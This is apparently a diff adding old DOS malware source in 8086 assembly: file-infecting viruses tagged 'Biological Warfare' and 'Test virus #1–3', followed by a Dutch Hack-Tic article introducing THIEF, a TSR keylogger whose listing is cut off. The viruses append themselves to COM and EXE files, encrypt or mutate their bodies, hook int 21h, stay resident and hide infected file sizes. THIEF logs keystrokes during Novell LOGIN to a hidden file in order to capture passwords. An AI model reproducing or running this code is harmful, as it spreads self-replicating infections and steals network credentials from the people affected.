jne its_ok_2
|
||||
jmp infect_exe
|
||||
its_ok_2:
|
||||
mov al,2 ; move to end of file
|
||||
call move_file_ptr
|
||||
|
||||
cmp dx,65279 - (VIRUS_SIZE + 3)
|
||||
ja dont_infect ; too big, don't infect
|
||||
|
||||
mov word ptr new_jump + 1,dx
|
||||
|
||||
add dx,103h
|
||||
mov mutator,dx
|
||||
push cs ; call Biological Warfare
|
||||
pop es ; Mutation Engine
|
||||
mov cx,VIRUS_SIZE
|
||||
mov di,offset encrypt_buffer
|
||||
mov si,offset virus_begin
|
||||
|
||||
call _bwme
|
||||
|
||||
push cx
|
||||
mov cx,3
|
||||
mov ah,40h
|
||||
mov dx,offset read_buffer ; save original program head
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; write virus to file
|
||||
pop cx
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
xor al,al ; back to beginning of file
|
||||
call move_file_ptr
|
||||
|
||||
mov dx,offset new_jump ; and write new jump
|
||||
int 21h
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
and cl,-32 ; add time stamp
|
||||
or cl,STAMP
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop es ds di si dx cx bx ax
|
||||
jmp int_21_exit ; leave
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
move_file_ptr:
|
||||
mov ah,42h ; move file pointer
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov dx,ax ; set up registers
|
||||
mov ah,40h
|
||||
mov cx,3
|
||||
ret
|
||||
infect_exe:
|
||||
cmp word ptr read_buffer[26],0
|
||||
jne dont_infect ; overlay, don't infect
|
||||
|
||||
cmp word ptr read_buffer[16],MARKER
|
||||
je dont_infect ; infected already
|
||||
|
||||
les ax,dword ptr read_buffer[20]
|
||||
mov exe_cs,es ; CS
|
||||
mov exe_ip,ax ; IP
|
||||
|
||||
les ax,dword ptr read_buffer[14]
|
||||
mov exe_ss,ax ; SS
|
||||
mov exe_sp,es ; SP
|
||||
mov word ptr read_buffer[16],MARKER
|
||||
|
||||
mov ax,4202h ; to end of file
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
push ax dx ; save file size
|
||||
|
||||
push bx
|
||||
mov cl,12 ; calculate offsets for CS
|
||||
shl dx,cl ; and IP
|
||||
mov bx,ax
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
add dx,bx
|
||||
and ax,15
|
||||
pop bx
|
||||
|
||||
sub dx,word ptr read_buffer[8]
|
||||
mov word ptr read_buffer[22],dx
|
||||
mov word ptr read_buffer[20],ax
|
||||
add dx,100
|
||||
mov word ptr read_buffer[14],dx
|
||||
|
||||
pop dx ax ; calculate prog size
|
||||
|
||||
add ax,VIRUS_SIZE + 3
|
||||
adc dx,0
|
||||
mov cx,512 ; in pages
|
||||
div cx ; then save results
|
||||
inc ax
|
||||
mov word ptr read_buffer[2],dx
|
||||
mov word ptr read_buffer[4],ax
|
||||
mov dx,word ptr read_buffer[20]
|
||||
mov cx,VIRUS_SIZE ; call BWME
|
||||
mov di,offset encrypt_buffer
|
||||
mov si,offset virus_begin
|
||||
push cs
|
||||
pop es
|
||||
|
||||
call _bwme
|
||||
|
||||
|
||||
mov ah,40h
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
|
||||
mov ax,4200h ; back to beginning
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; and fix up header
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
jmp fix_date_time ; done
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
signature db 'Test virus #1',0
|
||||
|
||||
get_extension:
|
||||
push ds ; find extension
|
||||
pop es
|
||||
mov di,dx
|
||||
mov cx,64
|
||||
mov al,'.'
|
||||
repnz scasb
|
||||
ret
|
||||
include bwme.asm
|
||||
|
||||
int_24:
|
||||
mov al,3 ; int 24 handler
|
||||
iret
|
||||
mutator dw 106h
|
||||
new_jump db 0E9h,0,0
|
||||
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,303 @@
|
|||
; test2.asm : Test virus #2
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0A6CFh
|
||||
INFECT equ 2
|
||||
MARKER equ 08080h
|
||||
|
||||
code segment
|
||||
org 100h
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
xor ax,ax ; mild anti-trace code
|
||||
mov es,ax ; kill interrupts 1 & 3
|
||||
mov di,6
|
||||
stosw
|
||||
mov di,14
|
||||
stosw
|
||||
|
||||
in al,21h ; lock out & reopen keyboard
|
||||
xor al,2
|
||||
out 21h,al
|
||||
xor al,2
|
||||
out 21h,al
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,[bp + offset new_DTA]
|
||||
mov ah,1Ah
|
||||
int 21h
|
||||
|
||||
mov byte ptr [bp + infections],0
|
||||
|
||||
push [bp + exe_cs]
|
||||
push [bp + exe_ip]
|
||||
push [bp + exe_ss]
|
||||
push [bp + exe_sp]
|
||||
call traverse
|
||||
|
||||
call activate
|
||||
|
||||
pop [bp + exe_sp]
|
||||
pop [bp + exe_ss]
|
||||
pop [bp + exe_ip]
|
||||
pop [bp + exe_cs]
|
||||
pop es ds
|
||||
mov dx,80h
|
||||
mov ah,1Ah
|
||||
int 21h
|
||||
|
||||
exe_exit:
|
||||
mov ax,ds ; fix up return address
|
||||
add ax,10h
|
||||
push ax
|
||||
add ax,cs:[bp + exe_cs]
|
||||
mov cs:[bp + return_cs],ax
|
||||
|
||||
mov ax,cs:[bp + exe_ip]
|
||||
mov cs:[bp + return_ip],ax
|
||||
|
||||
pop ax
|
||||
add ax,cs:[bp + exe_ss] ; restore stack
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp + exe_sp]
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
sti
|
||||
|
||||
db 0EAh ; back to host program
|
||||
return_ip dw 0
|
||||
return_cs dw 0
|
||||
|
||||
exe_cs dw -16 ; orig CS:IP
|
||||
exe_ip dw 103h
|
||||
exe_sp dw -2 ; orig SS:SP
|
||||
exe_ss dw -16
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
|
||||
traverse:
|
||||
sub sp,64 ; allocate stack space
|
||||
mov si,sp
|
||||
inc si
|
||||
mov ah,47h ; get current directory
|
||||
xor dl,dl
|
||||
push ds
|
||||
push ss
|
||||
pop ds
|
||||
int 21h
|
||||
|
||||
pop ds
|
||||
dec si
|
||||
mov byte ptr ss:[si],'\' ; fix directory
|
||||
|
||||
next_dir:
|
||||
call infect_dir
|
||||
|
||||
cmp byte ptr [bp + infections],INFECT
|
||||
je traverse_done
|
||||
|
||||
lea dx,[bp + outer] ; repeat in next dir up
|
||||
mov ah,3Bh
|
||||
int 21h
|
||||
jnc next_dir
|
||||
|
||||
traverse_done:
|
||||
add sp,64 ; reset
|
||||
mov dx,si
|
||||
push ds
|
||||
push ss
|
||||
pop ds
|
||||
mov ah,3Bh
|
||||
int 21h
|
||||
pop ds
|
||||
ret
|
||||
|
||||
infect_dir:
|
||||
mov ah,4Eh
|
||||
lea dx,[bp + find_me]
|
||||
int 21h
|
||||
jc infect_done
|
||||
|
||||
next_file:
|
||||
lea dx,[bp + new_DTA + 1Eh]
|
||||
call execute
|
||||
cmp byte ptr [bp + infections],INFECT
|
||||
je infect_done
|
||||
mov ah,4Fh
|
||||
int 21h
|
||||
jnc next_file
|
||||
|
||||
infect_done:
|
||||
ret
|
||||
execute:
|
||||
push si
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
int 21h
|
||||
jc cant_open
|
||||
xchg bx,ax
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
lea dx,[bp + read_buffer]
|
||||
int 21h
|
||||
|
||||
cmp word ptr [bp + read_buffer],'ZM'
|
||||
je infect_exe ; yes, infect as .EXE
|
||||
|
||||
jmp dont_infect
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
inc byte ptr [bp + infections]
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop si
|
||||
ret
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
infect_exe:
|
||||
cmp word ptr [bp + read_buffer + 26],0
|
||||
jne dont_infect ; overlay, don't infect
|
||||
|
||||
cmp word ptr [bp + read_buffer + 16],MARKER
|
||||
je dont_infect ; infected already
|
||||
|
||||
les ax,dword ptr [bp + read_buffer + 20]
|
||||
mov [bp + exe_cs],es
|
||||
mov [bp + exe_ip],ax
|
||||
les ax,dword ptr [bp + read_buffer + 14]
|
||||
mov [bp + exe_ss],ax
|
||||
mov [bp + exe_sp],es
|
||||
mov word ptr [bp + read_buffer + 16],MARKER
|
||||
mov ax,4202h ; to end of file
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
push ax dx ; save file size
|
||||
|
||||
push bx
|
||||
mov cl,12 ; calculate offsets for CS
|
||||
shl dx,cl ; and IP
|
||||
mov bx,ax
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
add dx,bx
|
||||
and ax,15
|
||||
pop bx
|
||||
|
||||
sub dx,word ptr [bp + read_buffer + 8]
|
||||
mov word ptr [bp + read_buffer + 22],dx
|
||||
mov word ptr [bp + read_buffer + 20],ax
|
||||
add dx,100h
|
||||
mov word ptr [bp + read_buffer + 14],dx
|
||||
|
||||
pop dx ax ; calculate prog size
|
||||
|
||||
add ax,VIRUS_SIZE + 3
|
||||
adc dx,0
|
||||
mov cx,512 ; in pages
|
||||
div cx ; then save results
|
||||
inc ax
|
||||
mov word ptr [bp + read_buffer + 2],dx
|
||||
mov word ptr [bp + read_buffer + 4],ax
|
||||
|
||||
mov ah,40h
|
||||
mov cx,VIRUS_SIZE + 3
|
||||
lea dx,[bp + virus_begin]
|
||||
int 21h
|
||||
|
||||
|
||||
mov ax,4200h ; back to beginning
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; and fix up header
|
||||
mov cx,28
|
||||
lea dx,[bp + read_buffer]
|
||||
int 21h
|
||||
jmp fix_date_time ; done
|
||||
|
||||
activate:
|
||||
; Insert your routine here
|
||||
ret
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
signature db 'Test virus #2',0
|
||||
|
||||
get_extension:
|
||||
push ds ; find extension
|
||||
pop es
|
||||
mov di,dx
|
||||
mov cx,64
|
||||
mov al,'.'
|
||||
repnz scasb
|
||||
ret
|
||||
|
||||
find_me db '*.EXE',0
|
||||
outer db '..',0
|
||||
|
||||
infections db 0
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
new_DTA db 128 dup(?)
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,318 @@
|
|||
; test3.asm : Test virus #3
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0FA10h
|
||||
PONG equ 0B8D4h
|
||||
STAMP equ 31
|
||||
|
||||
code segment
|
||||
org 0
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
|
||||
db 0BBh ; decryption module
|
||||
code_offset dw offset virus_code
|
||||
mov si,VIRUS_SIZE / 2 + 1
|
||||
db 0B8h
|
||||
cipher dw 0
|
||||
|
||||
decrypt:
|
||||
xor cs:[bx],ax
|
||||
add bx,2
|
||||
dec si
|
||||
jnz decrypt
|
||||
|
||||
|
||||
virus_code:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
mov ax,PING ; test for residency
|
||||
int 21h
|
||||
cmp dx,PONG
|
||||
je installed
|
||||
|
||||
mov ax,es ; Get PSP
|
||||
dec ax
|
||||
mov ds,ax ; Get MCB
|
||||
|
||||
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||||
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||||
mov es,word ptr ds:[12h]
|
||||
|
||||
push cs ; copy virus into memory
|
||||
pop ds
|
||||
xor di,di
|
||||
mov si,bp
|
||||
mov cx,(virus_end - start) / 2 + 1
|
||||
rep movsw
|
||||
|
||||
xor ax,ax ; capture interrupts
|
||||
mov ds,ax
|
||||
|
||||
mov si,21h * 4 ; get original int 21
|
||||
mov di,offset old_int_21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr ds:[si - 4],offset new_int_21
|
||||
mov ds:[si - 2],es ; and set new int 21
|
||||
|
||||
installed:
|
||||
pop es ds ; restore segregs
|
||||
com_exit:
|
||||
lea si,[bp + host] ; restore host program
|
||||
mov di,100h
|
||||
push di
|
||||
movsw
|
||||
movsb
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
ret ; and leave
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
; interrupt 21 handler
|
||||
int_21:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
ret
|
||||
|
||||
new_int_21:
|
||||
cmp ax,PING ; residency test
|
||||
je ping_pong
|
||||
cmp ah,11h ; directory stealth
|
||||
je dir_stealth
|
||||
cmp ah,12h
|
||||
je dir_stealth
|
||||
cmp ah,4Eh ; directory stealth
|
||||
je dir_stealth_2
|
||||
cmp ah,4Fh
|
||||
je dir_stealth_2
|
||||
cmp ax,4B00h ; execute program
|
||||
jne int_21_exit
|
||||
jmp execute
|
||||
int_21_exit:
|
||||
db 0EAh ; never mind ...
|
||||
old_int_21 dd 0
|
||||
|
||||
ping_pong:
|
||||
mov dx,PONG
|
||||
iret
|
||||
|
||||
dir_stealth:
|
||||
call int_21 ; get dir entry
|
||||
test al,al
|
||||
js dir_stealth_done
|
||||
|
||||
push ax bx es
|
||||
mov ah,2Fh
|
||||
int 21h
|
||||
|
||||
cmp byte ptr es:[bx],-1 ; check for extended FCB
|
||||
jne no_ext_FCB
|
||||
add bx,7
|
||||
no_ext_FCB:
|
||||
mov ax,es:[bx + 17h] ; check for infection marker
|
||||
and al,31
|
||||
cmp al,STAMP
|
||||
jne dir_fixed
|
||||
|
||||
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
|
||||
sbb word ptr es:[bx + 1Fh],0
|
||||
dir_fixed:
|
||||
pop es bx ax
|
||||
dir_stealth_done:
|
||||
iret
|
||||
|
||||
dir_stealth_2:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
jc dir_stealth_done_2
|
||||
|
||||
check_infect2:
|
||||
push ax bx es
|
||||
|
||||
mov ah,2Fh
|
||||
int 21h
|
||||
mov ax,es:[bx + 16h]
|
||||
and al,31 ; check timestamp
|
||||
cmp al,STAMP
|
||||
jne fixed_2
|
||||
|
||||
sub es:[bx + 1Ah],VIRUS_SIZE + 3
|
||||
sbb word ptr es:[bx + 1Ch],0
|
||||
|
||||
fixed_2:
|
||||
pop es bx ax
|
||||
clc ; clear carry
|
||||
dir_stealth_done_2:
|
||||
retf 2
|
||||
execute:
|
||||
push ax bx cx dx si di ds es
|
||||
|
||||
xor ax,ax ; critical error handler
|
||||
mov es,ax ; routine - catch int 24
|
||||
mov es:[24h * 4],offset int_24
|
||||
mov es:[24h * 4 + 2],cs
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
int 21h
|
||||
jc cant_open
|
||||
xchg bx,ax
|
||||
|
||||
push cs ; CS = DS
|
||||
pop ds
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
|
||||
cmp word ptr read_buffer,'ZM' ; .EXE?
|
||||
je dont_infect ; .EXE, skip
|
||||
|
||||
mov al,2 ; move to end of file
|
||||
call move_file_ptr
|
||||
|
||||
cmp dx,65279 - (VIRUS_SIZE + 3)
|
||||
ja dont_infect ; too big, don't infect
|
||||
|
||||
sub dx,VIRUS_SIZE + 3 ; check for previous infection
|
||||
cmp dx,word ptr read_buffer + 1
|
||||
je dont_infect
|
||||
|
||||
add dx,VIRUS_SIZE + 3
|
||||
mov word ptr new_jump + 1,dx
|
||||
|
||||
add dx,103h
|
||||
call encrypt_code ; encrypt virus
|
||||
|
||||
mov dx,offset read_buffer ; save original program head
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; write virus to file
|
||||
mov cx,VIRUS_SIZE
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
xor al,al ; back to beginning of file
|
||||
call move_file_ptr
|
||||
|
||||
mov dx,offset new_jump ; and write new jump
|
||||
int 21h
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
and cl,-32 ; add time stamp
|
||||
or cl,STAMP
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop es ds di si dx cx bx ax
|
||||
jmp int_21_exit ; leave
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
move_file_ptr:
|
||||
mov ah,42h ; move file pointer
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov dx,ax ; set up registers
|
||||
mov ah,40h
|
||||
mov cx,3
|
||||
ret
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
signature db 'Test virus #3',0
|
||||
|
||||
|
||||
encrypt_code:
|
||||
push ax cx
|
||||
|
||||
push dx
|
||||
xor ah,ah ; get time for random number
|
||||
int 1Ah
|
||||
|
||||
mov cipher,dx ; save encryption key
|
||||
pop cx
|
||||
add cx,virus_code - virus_begin
|
||||
mov code_offset,cx ; save code offset
|
||||
|
||||
push cs ; ES = CS
|
||||
pop es
|
||||
|
||||
mov si,offset virus_begin ; move decryption module
|
||||
mov di,offset encrypt_buffer
|
||||
mov cx,virus_code - virus_begin
|
||||
rep movsb
|
||||
|
||||
mov cx,VIRUS_SIZE / 2 + 1
|
||||
encrypt:
|
||||
lodsw ; encrypt virus code
|
||||
xor ax,dx
|
||||
stosw
|
||||
loop encrypt
|
||||
|
||||
pop cx ax
|
||||
ret
|
||||
|
||||
int_24:
|
||||
mov al,3 ; int 24 handler
|
||||
iret
|
||||
new_jump db 0E9h,0,0
|
||||
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,269 @@
|
|||
;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop.
|
||||
;Nadruk wordt door de redaktie toegestaan!
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken
|
||||
;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of
|
||||
;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het
|
||||
;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van
|
||||
;een anonieme auteur.
|
||||
;
|
||||
; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma
|
||||
;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om
|
||||
;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong
|
||||
;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington
|
||||
;High School in Denver, Colorado USA.
|
||||
; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30
|
||||
;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait
|
||||
;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op
|
||||
;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden
|
||||
;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende
|
||||
;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2
|
||||
;model 80's(!) met harddisks. De systeembeheerders en andere "power-users"
|
||||
;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen
|
||||
;hard-disks, zij gebruiken geen boot-proms.
|
||||
; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF
|
||||
;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase.
|
||||
;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen"
|
||||
;programma op de bootschijf activeerde. Zodra er echter een programma met de
|
||||
;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle
|
||||
;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De
|
||||
;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft.
|
||||
; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de
|
||||
;zwakheden die deze hack mogelijk maken:
|
||||
; -Een boot-proces dat veranderd kan worden
|
||||
; -Fysieke toegang (door een onbevoegde) tot de computer
|
||||
; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is
|
||||
;Kees.
|
||||
; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde
|
||||
;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS:
|
||||
;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te
|
||||
;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op
|
||||
;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS.
|
||||
;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle
|
||||
;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het
|
||||
;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een
|
||||
;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had
|
||||
;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach,
|
||||
;zo werkt het ook.
|
||||
; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als
|
||||
;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de
|
||||
;problematiek van LAN-beveiliging.
|
||||
; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo
|
||||
;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte
|
||||
;genialiteit.
|
||||
;
|
||||
; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker
|
||||
;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren.
|
||||
;
|
||||
;
|
||||
; DE CODE VAN THIEF:
|
||||
;
|
||||
;
|
||||
cseg segment
|
||||
assume cs:cseg,ds:cseg
|
||||
|
||||
org 100h
|
||||
public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
|
||||
public cntr,lits,begin
|
||||
|
||||
.RADIX 16
|
||||
start:
|
||||
push cs
|
||||
push cs
|
||||
push cs
|
||||
pop ds
|
||||
pop es
|
||||
mov ax,0fffeh
|
||||
CLI
|
||||
pop ss
|
||||
mov sp,ax
|
||||
STI
|
||||
jmp begin
|
||||
oi21 dd ?
|
||||
ac dw 0
|
||||
ob dw 80h dup (?)
|
||||
buff2 db 80h dup (?)
|
||||
fn db 'c:\testing.tmp',0,' '
|
||||
search1 db 'LOGIN'
|
||||
foundf db 0
|
||||
fh dw 0
|
||||
flag db 0
|
||||
cntr dw 0
|
||||
|
||||
ni21:
|
||||
assume cs:cseg,ds:nothing,es:nothing
|
||||
cmp ax,4b00h
|
||||
je exec
|
||||
cmp foundf,0ffh
|
||||
jne nc
|
||||
cmp ah,8
|
||||
je oc
|
||||
cmp ah,7
|
||||
je oc
|
||||
|
||||
nc:
|
||||
push ax
|
||||
mov al,cs:flag
|
||||
not al
|
||||
cmp al,0
|
||||
jne jtov
|
||||
mov ax,cntr
|
||||
inc ax
|
||||
mov cntr,ax
|
||||
cmp ax,31h
|
||||
jb jtov
|
||||
xor ax,ax
|
||||
mov cntr,ax
|
||||
mov flag,al
|
||||
pop ax
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
jmp short wpwtf
|
||||
|
||||
jtov:
|
||||
pop ax
|
||||
jmp dword ptr cs:[oi21]
|
||||
|
||||
exec: call scanfor
|
||||
jmp nc
|
||||
oc:
|
||||
|
||||
pushf
|
||||
call dword ptr cs:[oi21]
|
||||
assume ds:cseg
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
mov bx,ac
|
||||
mov [bx],al
|
||||
inc bx
|
||||
mov [ac],bx
|
||||
cmp al,0dh
|
||||
jne lethro
|
||||
mov byte ptr [bx],0ah
|
||||
not cs:[flag]
|
||||
lethro:
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
pop ds
|
||||
iret
|
||||
|
||||
scanfor:
|
||||
push ax
|
||||
push di
|
||||
push si
|
||||
push es
|
||||
push ds
|
||||
push cs
|
||||
push cs
|
||||
pop es
|
||||
mov si,dx
|
||||
mov di,offset buff2
|
||||
moveit:
|
||||
lodsb
|
||||
and al,0dfh
|
||||
stosb
|
||||
or al,al
|
||||
jnz moveit
|
||||
pop ds
|
||||
mov di,offset buff2
|
||||
look:
|
||||
push di
|
||||
mov si,offset search1
|
||||
mov cx,5
|
||||
repe cmpsb
|
||||
pop di
|
||||
or cx,cx
|
||||
jz foundit
|
||||
inc di
|
||||
cmp byte ptr [di+5],0
|
||||
je not_found
|
||||
jmp look
|
||||
not_found:
|
||||
xor ax,ax
|
||||
mov foundf,al
|
||||
jmp short endofsearch
|
||||
foundit:
|
||||
mov ax,0ffh
|
||||
mov foundf,al
|
||||
endofsearch:
|
||||
pop ds
|
||||
pop es
|
||||
pop si
|
||||
pop di
|
||||
pop ax
|
||||
ret
|
||||
|
||||
wpwtf:
|
||||
mov ax,3d02h
|
||||
mov dx,offset fn
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jnc exist
|
||||
cmp al,2
|
||||
je create
|
||||
jmp lethro
|
||||
create:
|
||||
mov ah,3ch
|
||||
mov dx,offset fn
|
||||
mov cx,02h+04h
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jnc exist
|
||||
jmp lethro
|
||||
exist:
|
||||
mov fh,ax
|
||||
mov bx,ax
|
||||
mov ax,4202h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
mov cx,[ac]
|
||||
mov dx,offset ob
|
||||
sub cx,dx
|
||||
mov [ac],dx
|
||||
inc cx
|
||||
mov bx,fh
|
||||
mov ah,40h
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
mov ah,3eh
|
||||
mov bx,fh
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jmp lethro
|
||||
|
||||
lits db 90h
|
||||
begin:
|
||||
mov ax,offset ob
|
||||
mov [ac],ax
|
||||
